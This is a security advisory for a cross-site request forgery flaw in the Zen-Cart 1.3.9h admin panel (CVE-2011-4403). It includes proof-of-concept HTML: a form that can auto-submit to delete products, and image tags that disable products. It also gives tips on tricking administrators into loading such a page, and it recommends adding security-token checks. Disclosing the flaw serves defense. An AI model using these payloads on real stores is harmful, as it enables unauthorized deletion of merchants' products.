Zen-Cart 1.3.9h Cross Site Request Forgery

2012.02.12
Credit: DisK0nn3cT
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2011-4403
CWE: CWE-352


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

*Advisory Information* Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products Date published: 2012-02-10 01:59:45 AM upSploit Ref: UPS-2011-0018 CVE REF: CVE-2011-4403 *Advisory Summary* An attacker can force an administrator to delete or disable products from within his store. *Vendor* Zen-Cart *Affected Software* Zen-Cart v1.3.9h Zen Cart truly is the art of e-commerce; free, user-friendly, open source shopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be and should be done differently. *Description of Issue* This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By submitting this form from any location an attacker can cause the administrator to delete / disable products from his store. *PoC* Requirements 1. Admin user (target) must have a valid session id. Even if they have closed the admin window, this attack is still successful 2. The attacker must obtain the admin url * Social Engineer an admin user (trick them) * Packet Capture * Email headers * Invoice print out * * I know these have been addressed in your security forum topics, but most users are not aware of these issues 3. The attacker must obtain the product id * This is public information 4. The attack must then social engineer (trick them) into loading the page * Email with images * Post a forum topic with the images * Link them to a page on the attackers server Proof of Concept Delete: This form can be hidden and made to submit automatically on page load: <form name="products" action=" http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm" method="post"> <label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything" /><br/><br/> <label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/> <label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/> <input type="submit" border="0" alt="Delete" value=" Delete Product"> </form> Disable: <img src=" http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1 "/> <img src=" http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2 "/> <img src=" http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3 "/> <img src=" http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4 "/> <img src=" http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5 "/> Proposed Solution * Add the security token conditional statement to the delete_product_confirm.php for all product types * This should be applied to all requests made within the admin control panel rather than just key operations *Credits* DisK0nn3cT *References* http://www.zen-cart.com/ http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005) *Patch/Fix* Update to the latest version

References:

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005
)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top